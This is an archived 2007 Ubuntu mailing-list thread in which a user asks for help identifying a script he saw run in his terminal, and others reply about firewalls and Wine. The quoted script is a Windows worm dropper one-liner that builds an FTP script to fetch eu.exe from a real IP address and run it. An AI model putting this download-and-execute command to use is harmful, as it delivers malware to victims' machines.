Antivirus program for ubuntu feisty amd64

cj debiani386 at gmail.com
Sat May 12 06:07:13 UTC 2007 

Lucio M Nicolosi wrote:
> cj wrote:
>   
>> Lucio M Nicolosi wrote:
>>   
>>     
>>> Mario Vukelic wrote:
>>>   
>>>     
>>>       
>>>>> You would not have had any infections on Linux without the antivir
>>>>> program either, since there are no Linux viruses in the wild :)
>>>>>       
>>>>>         
>>>>>           
>>> New to Linux, installed a Ubuntu 6.10 partition (for tests) in my office 
>>> desktop, connected to Novell Netware and an ADSL link (Suse Linux Proxy 
>>> and Firewall).
>>>
>>> A couple of days ago noticed an application suddenly taking control of 
>>> the terminal window and running the following script:
>>>
>>> (user)@phil:~$ 5~.~
>>>
>>> (user)@phil::~$ %systemroot%\system32\cmd.exe
>>>
>>> (user)@phil:~$ cmd /c echo open 201.27.157.123 42043 >> ik     &echo 
>>> user t g >> ik &echo get eu.exe >> ik &echo bye >> ik &ftp -n -v -s:ik 
>>> &del ik &eu.exe &exit
>>>
>>> from the script "ik" in /home/(user)
>>>
>>> Could't find any "ik" script in my home (Ubuntu 7.04) desktop.
>>>
>>> Looked like a worm, then I run antivirus on Win partition, looked for 
>>> the Windows "eu.exe" virus and variants but found no trace of it, at 
>>> least on my desktop.
>>>
>>> Has anyone any idea of what kind of script is this?
>>>
>>> L.
>>>
>>>   
>>>     
>>>       
>> More then likely, someone logged on to your computer (looks like they 
>> did it through telnet, but i could be wrong). In that case, either hook 
>> your computer into a firewall or download one for linux (which linux 
>> doesnt really need one, but if you are using your system for large-scale 
>> business, then its a good idea to get a firewall)
>>
>> Sometimes i have noticed that when somebody logs on to my system and 
>> runs there script (yes i was hacked once..good thing my firewall blocked 
>> the attack...but it didnt catch the remote login?), it doesnt execute 
>> right..just fyi..most of the time it does though, especially when DoSing.
>>
>> --cj
>>
>>   
>>     
> Since my Intranet is already behind a (Suse) firewall, I was wondering 
> if (either it was invaded or) a worm residing on another (Win) desktop 
> could take control of my (Linux) terminal and run this script to try 
> install itself in the Win environment. Since it apparently happened in 
> two different ocasions, it looks like an autorun script. Could you tell 
> me where to find the autorun config file in Ubuntu?
>
> Tks for the answer, cj.
>
> L.
>
>   
well the problem is, is that a worm on windows will not harm a linux 
system, as windows programs are not linux compatible with out a windows 
compatibility layer (such as _wine_ )
--cj

More information about the ubuntu-users mailing list